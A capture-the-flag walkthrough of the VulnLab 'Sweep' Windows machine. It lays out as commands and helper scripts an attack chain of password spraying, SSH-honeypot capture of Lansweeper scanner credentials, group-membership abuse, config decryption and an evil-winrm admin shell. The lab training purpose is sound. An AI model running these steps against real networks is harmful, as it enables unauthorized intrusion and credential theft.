Sweep - VulnLab Full Walkthrough (TJnull OSCP List)
Overview
Sweep is a medium-difficulty Windows machine from VulnLab, featured on TJnull’s OSCP preparation list. This box focuses on Active Directory enumeration, Lansweeper exploitation, and creative credential harvesting techniques using SSH honeypots.
Machine Details:
- Platform: VulnLab (TJnull List)
- Difficulty: Medium
- OS: Windows Server 2022
- Domain: sweep.vl
- Machine Name: INVENTORY
- Focus Areas: Active Directory, Lansweeper, Group Manipulation
Reconnaissance
Initial Nmap Scan
Start with a service scan of the common ports (`-sC -sV` covers nmap's top 1000 ports; add `-p-` if you want all 65535 checked as well):

```bash
nmap -sC -sV -oN sweep_nmap.txt 10.10.x.x
```
Key Ports Identified:
| Port | Service | Notes |
|---|---|---|
| 53 | DNS | Domain name resolution |
| 81 | HTTP | Lansweeper web interface |
| 82 | HTTP | Additional web service |
| 88 | Kerberos | Active Directory authentication |
| 389 | LDAP | Directory services |
| 3389 | RDP | Remote Desktop Protocol |
Domain Information:
- Domain: sweep.vl
- Hostname: INVENTORY
- OS: Windows Server 2022
Enumeration
SMB Enumeration with CrackMapExec
Enumerate SMB shares as the guest account (the same commands work unchanged with NetExec, the maintained fork of CrackMapExec, by replacing `crackmapexec` with `nxc`):

```bash
crackmapexec smb 10.10.x.x -u 'guest' -p '' --shares
```
Accessible Shares:
- DefaultPackageShare$
- Lansweeper$
RID Brute-Forcing
Enumerate domain users and groups by resolving RIDs through the guest session (the default range stops at RID 4000; pass a higher value after `--rid-brute` if the domain is larger):

```bash
crackmapexec smb 10.10.x.x -u 'guest' -p '' --rid-brute
```
Findings:
- 17 domain users discovered
- Notable group: “Lansweeper Admins”
Username Enumeration
Extract the usernames (the `SidTypeUser` entries) from the RID brute-force output and save them to a user list, one per line:

```text
# Save usernames to users.txt
intern
svc_inventory_lnx
svc_inventory_win
# ... additional users
```
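Pulling the names out of the RID brute-force output by hand is error-prone once a domain has more than a handful of accounts. The script below is an added example, not part of the original walkthrough: it parses the `<RID>: <DOMAIN>\<name> (SidType...)` lines that crackmapexec/nxc print, splits users from groups, and drops machine accounts (names ending in `$`) that would only waste attempts in the username=password test. The sample output embedded in it is constructed for the example; RIDs, the address and the group type are illustrative, not the real box output.

```python
import re
import sys

# Constructed sample of `crackmapexec smb ... --rid-brute` output (illustrative only;
# RIDs, names, address and SID types are made up for this example, not real box output).
SAMPLE_RID_OUTPUT = """\
SMB         10.10.x.x       445    INVENTORY        [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.x.x       445    INVENTORY        500: SWEEP\\Administrator (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        501: SWEEP\\Guest (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        512: SWEEP\\Domain Admins (SidTypeGroup)
SMB         10.10.x.x       445    INVENTORY        513: SWEEP\\Domain Users (SidTypeGroup)
SMB         10.10.x.x       445    INVENTORY        1000: SWEEP\\INVENTORY$ (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        1104: SWEEP\\intern (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        1105: SWEEP\\svc_inventory_lnx (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        1106: SWEEP\\svc_inventory_win (SidTypeUser)
SMB         10.10.x.x       445    INVENTORY        1107: SWEEP\\Lansweeper Admins (SidTypeAlias)
"""

# One resolved RID per line: "<rid>: <DOMAIN>\<name> (<SidType>)". Names may contain spaces,
# so the name group is lazy and anchored on the trailing "(SidType...)".
RID_RE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(output: str):
    """Return (rid, domain, name, kind) for every resolved RID line; banner and status lines are skipped."""
    entries = []
    for line in output.splitlines():
        m = RID_RE.search(line)
        if m:
            entries.append((int(m["rid"]), m["domain"], m["name"], m["kind"]))
    return entries


def user_names(entries, include_machines=False):
    """Usernames for password spraying: SidTypeUser only, machine accounts (trailing $) dropped by default."""
    seen, users = set(), []
    for _, _, name, kind in entries:
        if kind != "SidTypeUser":
            continue
        if name.endswith("$") and not include_machines:
            continue
        if name not in seen:          # keep first occurrence, preserve RID order
            seen.add(name)
            users.append(name)
    return users


def group_names(entries):
    """Global groups and aliases (domain local groups), worth cross-checking against BloodHound's ACL edges."""
    return [name for _, _, name, kind in entries if kind in ("SidTypeGroup", "SidTypeAlias")]


def write_wordlist(path, names):
    """Write one name per line, the format crackmapexec's -u/-p file arguments expect."""
    with open(path, "w") as fh:
        fh.write("\n".join(names) + "\n")


if __name__ == "__main__":
    # Usage: crackmapexec smb <ip> -u guest -p '' --rid-brute | python3 rid_users.py
    text = SAMPLE_RID_OUTPUT if sys.stdin.isatty() else sys.stdin.read()
    entries = parse_rid_brute(text)
    users = user_names(entries)
    write_wordlist("users.txt", users)
    print(f"{len(users)} users written to users.txt")
    for group in group_names(entries):
        print("group:", group)
```

Pipe the real scanner output into the script; with no stdin it runs against the embedded sample so you can see the expected shape before touching a target.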
Initial Access
Username=Password Attack
Test whether any account uses its username as its password (a common weak configuration). `--no-bruteforce` pairs the two lists line by line instead of trying every combination, and `--continue-on-success` keeps going after the first hit so you do not miss a second account:

```bash
# Test each username as its own password
crackmapexec smb 10.10.x.x -u users.txt -p users.txt --no-bruteforce --continue-on-success
```
Success:

```text
intern:intern - Valid credentials!
```
Lansweeper Web Interface Access
Access the Lansweeper application on port 81:

```bash
firefox http://10.10.x.x:81
```
Log in with intern:intern to gain access to the Lansweeper web interface.
Active Directory Enumeration
BloodHound Collection
Use bloodhound-python to collect AD data (`-ns` points the collector's DNS lookups at the domain controller, which matters because your attacking host does not resolve sweep.vl by default):

```bash
bloodhound-python -d sweep.vl -u intern -p intern -c all -ns 10.10.x.x
```
Start neo4j and BloodHound in two separate terminals (the neo4j console stays in the foreground), then upload the generated JSON files and analyze:

```bash
# Start neo4j and bloodhound (two terminals)
sudo neo4j console
bloodhound
```
Key BloodHound Finding
Critical Discovery: svc_inventory_lnx has FullControl (BloodHound's GenericAll edge) over the “Lansweeper Admins” group. Full control of a group includes the right to write its member attribute, so compromising this account lets us add any principal, including svc_inventory_lnx itself, to the group.
Attack Path:
- Compromise the svc_inventory_lnx account
- Add svc_inventory_lnx to the “Lansweeper Admins” group
- Leverage the group's privileges for further access
Credential Harvesting
SSH Honeypot Strategy
Understanding Lansweeper: Lansweeper is an IT asset management tool that performs automated network scanning. To inventory Linux hosts it connects to discovered systems over SSH and authenticates with the credentials stored in its scanning configuration.
Attack Concept: Deploy an SSH honeypot on a host that Lansweeper will scan. When the scanner authenticates, the honeypot records the username and password it presents. Lansweeper only contacts hosts that fall inside a configured scanning target, so make sure your attacking host is in scope (the scanning configuration is reachable through the web interface you logged into as intern).
Deploy sshesame
Install and run the SSH honeypot. `go install` places the binary in `$(go env GOPATH)/bin`, which is usually not on root's PATH, so call it by full path under sudo. Also check `sshesame -help` on the version you installed: the current README documents a `-config` YAML file that carries the listen address, so the `-port`/`-host` flags below may not be accepted by newer releases.

```bash
# Install sshesame
go install github.com/jaksi/sshesame@latest
# Run on port 22 (ensure no other SSH service is running)
sudo sshesame -port 22 -host 0.0.0.0
```
Wait for Lansweeper to scan your system…
Captured Credentials:

```text
Username: svc_inventory_lnx
Password: [captured_password]
```
Privilege Escalation
Group Membership Manipulation
With svc_inventory_lnx credentials and FullControl over “Lansweeper Admins”, add the account to the group over RPC with Samba's net tool:

```bash
# Add svc_inventory_lnx to Lansweeper Admins group
net rpc group addmem 'Lansweeper Admins' 'svc_inventory_lnx' \
    -U sweep.vl/svc_inventory_lnx%[password] \
    -S 10.10.x.x
```
Verify group membership:

```bash
net rpc group members 'Lansweeper Admins' \
    -U sweep.vl/svc_inventory_lnx%[password] \
    -S 10.10.x.x
```
Lansweeper Configuration Decryption
Access Lansweeper Configuration: Lansweeper keeps its database connection string encrypted in the web application's web.config. Membership in Lansweeper Admins gives enough access to the Lansweeper host to read that file, and the key needed to decrypt it lives on the same host, so the decryption tool is run there rather than on the attacking machine.
Tool: SharpLansweeperDecrypt
Download from: GitHub - SharpLansweeperDecrypt

```powershell
# Decrypt web.config
.\SharpLansweeperDecrypt.exe -config "C:\Program Files\Lansweeper\Website\web.config"
```
Extracted Credentials:
- SQL Server credentials from the decrypted connection string
- Service account passwords stored (encrypted) in the Lansweeper database, including the svc_inventory_win credentials
Final Access
Evil-WinRM Shell
Connect with the discovered svc_inventory_win credentials:

```bash
evil-winrm -i 10.10.x.x -u svc_inventory_win -p '[password]'
```
Verify Privileges:

```powershell
whoami
whoami /priv
net user svc_inventory_win /domain
```
Success! svc_inventory_win has administrative privileges on the domain controller.
Retrieve Flags
```powershell
# User flag
type C:\Users\intern\Desktop\user.txt
# Root flag
type C:\Users\Administrator\Desktop\root.txt
```
Attack Chain Summary
```mermaid
graph TD
    A[Nmap Scan] --> B[SMB Enumeration]
    B --> C[RID Brute Force]
    C --> D[Username=Password Attack]
    D --> E[intern:intern Found]
    E --> F[BloodHound Analysis]
    F --> G[svc_inventory_lnx has FullControl]
    G --> H[Deploy SSH Honeypot]
    H --> I[Capture svc_inventory_lnx Creds]
    I --> J[Add to Lansweeper Admins]
    J --> K[Decrypt Lansweeper Config]
    K --> L[Extract svc_inventory_win Creds]
    L --> M[Evil-WinRM Admin Access]
```
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| crackmapexec | SMB enumeration and authentication testing |
| bloodhound-python | Active Directory privilege analysis |
| sshesame | SSH honeypot for credential capture |
| net rpc (Samba) | Group membership manipulation |
| SharpLansweeperDecrypt | Decrypt Lansweeper configurations |
| evil-winrm | Windows Remote Management shell |
Key Takeaways
Security Lessons
- Weak Password Policies
  - Username=password combinations are still common
  - Always test for this during assessments
- Service Account Permissions
  - Service accounts with FullControl over groups can be leveraged to add members to those groups
  - Follow the principle of least privilege
- Automated Scanning Risks
  - Scanners like Lansweeper present their stored credentials to any host inside a scanning target, a honeypot included
  - Implement proper credential management for scanning services (dedicated, least-privileged scan accounts and tightly scoped targets)
- Configuration File Security
  - Encrypted configurations may still yield sensitive data when the key sits next to them
  - Ensure proper access controls on configuration files
OSCP Preparation Tips
- BloodHound is Critical: Master BloodHound for identifying privilege escalation paths
- Understand Service Accounts: Know how to abuse service account privileges
- Creative Thinking: SSH honeypot technique shows importance of thinking outside the box
- Tool Familiarity: Practice with CrackMapExec, BloodHound, and Evil-WinRM
Troubleshooting
SSH Honeypot Not Capturing Credentials
Problem: sshesame is running but no credentials captured
Solutions:
- Ensure port 22 is open and reachable from the target network
- Stop any existing SSH service: `sudo systemctl stop ssh`
- Verify Lansweeper scanning is active and that your host is inside a configured scanning target (check the web interface)
- Check firewall rules: `sudo ufw allow 22`
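Both the honeypot section earlier and this troubleshooting entry hinge on one question: is the scanner actually reaching port 22 on your host? The listener below is an added example, not code from the walkthrough or from sshesame. It uses only the Python standard library, answers every connection with an SSH identification string (the `OUR_BANNER` value is a placeholder chosen for this example), and records the peer address plus whatever client banner comes back. It does not implement the SSH transport, so it never sees a password; its purpose is to confirm that Lansweeper connects to you, and what client it presents, before you swap in sshesame. `probe()` exercises it from any other machine.

```python
import datetime
import socket
import threading
import time

OUR_BANNER = b"SSH-2.0-OpenSSH_8.9\r\n"   # placeholder banner for this example, not sshesame's
BANNER_MAX = 255                          # RFC 4253: identification line is at most 255 bytes incl. CR LF


def parse_ssh_identification(data: bytes):
    """Parse 'SSH-protoversion-softwareversion SP comments CR LF' (RFC 4253 4.2).

    Returns a dict, or None when the bytes are not an SSH banner (an HTTP probe, a port scanner, ...)."""
    line = data.split(b"\n", 1)[0].rstrip(b"\r")
    if not line.startswith(b"SSH-"):
        return None
    parts = line.split(b"-", 2)           # "SSH", protoversion, "softwareversion[ comments]"
    if len(parts) != 3 or not parts[1] or not parts[2]:
        return None
    software, _, comments = parts[2].partition(b" ")
    return {
        "protoversion": parts[1].decode("ascii", "replace"),
        "software": software.decode("ascii", "replace"),
        "comments": comments.decode("ascii", "replace"),
    }


class BannerListener:
    """Accepts TCP connections, sends OUR_BANNER, records who connected and what client banner they sent.

    A reachability check only: with no key exchange behind it, no credentials are ever received."""

    def __init__(self, bind_addr="0.0.0.0", port=22):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((bind_addr, port))
        self.sock.listen(16)
        self.port = self.sock.getsockname()[1]   # resolved port (useful when port=0 was requested)
        self.hits = []                            # one dict per connection
        self._lock = threading.Lock()

    def start(self):
        threading.Thread(target=self._accept_loop, daemon=True).start()
        return self

    def _accept_loop(self):
        while True:
            try:
                conn, peer = self.sock.accept()
            except OSError:                       # listening socket closed by close()
                return
            threading.Thread(target=self._handle, args=(conn, peer), daemon=True).start()

    def _handle(self, conn, peer):
        with conn:
            conn.settimeout(5.0)
            data = b""
            try:
                conn.sendall(OUR_BANNER)          # speak first: some clients wait for the server banner
                data = conn.recv(BANNER_MAX)
            except (socket.timeout, OSError):
                pass
            ident = parse_ssh_identification(data)
            hit = {
                "time": datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds"),
                "ip": peer[0],
                "port": peer[1],
                "software": ident["software"] if ident else None,
                "raw": data,
            }
            with self._lock:
                self.hits.append(hit)
            print(f"{hit['time']} {hit['ip']}:{hit['port']} client={hit['software'] or 'no SSH banner'}")

    def close(self):
        self.sock.close()


def probe(host, port, banner=b"SSH-2.0-probe_client\r\n"):
    """Connect the way an SSH client does and return the server banner; run from another host to test reachability."""
    with socket.create_connection((host, port), timeout=5.0) as c:
        server_banner = c.recv(BANNER_MAX)
        c.sendall(banner)
    return server_banner


def wait_for_hits(listener, count=1, timeout=5.0):
    """Block until `count` connections were recorded or the timeout passes; returns a copy of the hits."""
    deadline = time.monotonic() + timeout
    while True:
        with listener._lock:
            if len(listener.hits) >= count or time.monotonic() >= deadline:
                return list(listener.hits)
        time.sleep(0.05)


if __name__ == "__main__":
    listener = BannerListener("0.0.0.0", 22).start()   # port 22 needs root and a stopped sshd
    print(f"listening on port {listener.port}, waiting for the scanner ...")
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        listener.close()
```

A hit whose `software` is None (an HTTP request, an nmap probe) is not the scanner; a hit with an SSH client string from the Lansweeper server's address tells you the target is in scope and the path is open, and the only thing left is a real SSH server implementation to take the authentication.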
Group Membership Changes Not Reflecting
Problem: Added user to group but changes don't apply
Solutions:
- Group membership is evaluated when a logon token is built, so log out and back in (or open a fresh Evil-WinRM or RDP session) to pick up the new group; `gpupdate /force` refreshes Group Policy, not the groups in an existing token
- In an environment with several domain controllers, wait for replication before testing against a different DC
- Verify with:

```bash
net rpc group members 'Lansweeper Admins' -U sweep.vl/svc_inventory_lnx%[password] -S 10.10.x.x
```
Evil-WinRM Connection Fails
Problem: Cannot connect even with valid credentials
Solutions:
- Verify the WinRM service is running on the target
- Check that port 5985 (HTTP) or 5986 (HTTPS) is reachable
- Try the SSL flag if only 5986 is open: `evil-winrm -i 10.10.x.x -u user -p pass -S`
- Ensure the account has remote access rights (WinRM allows local Administrators and members of Remote Management Users by default)
Quick Reference Commands
```bash
# Initial Enumeration
nmap -sC -sV -oN sweep.txt 10.10.x.x
crackmapexec smb 10.10.x.x -u 'guest' -p '' --shares
crackmapexec smb 10.10.x.x -u 'guest' -p '' --rid-brute
# Username=Password Attack
crackmapexec smb 10.10.x.x -u users.txt -p users.txt --no-bruteforce
# BloodHound Collection
bloodhound-python -d sweep.vl -u intern -p intern -c all -ns 10.10.x.x
# SSH Honeypot
sudo sshesame -port 22 -host 0.0.0.0
# Group Manipulation
net rpc group addmem 'Lansweeper Admins' 'svc_inventory_lnx' \
    -U sweep.vl/svc_inventory_lnx%PASSWORD -S 10.10.x.x
# Final Access
evil-winrm -i 10.10.x.x -u svc_inventory_win -p 'PASSWORD'
```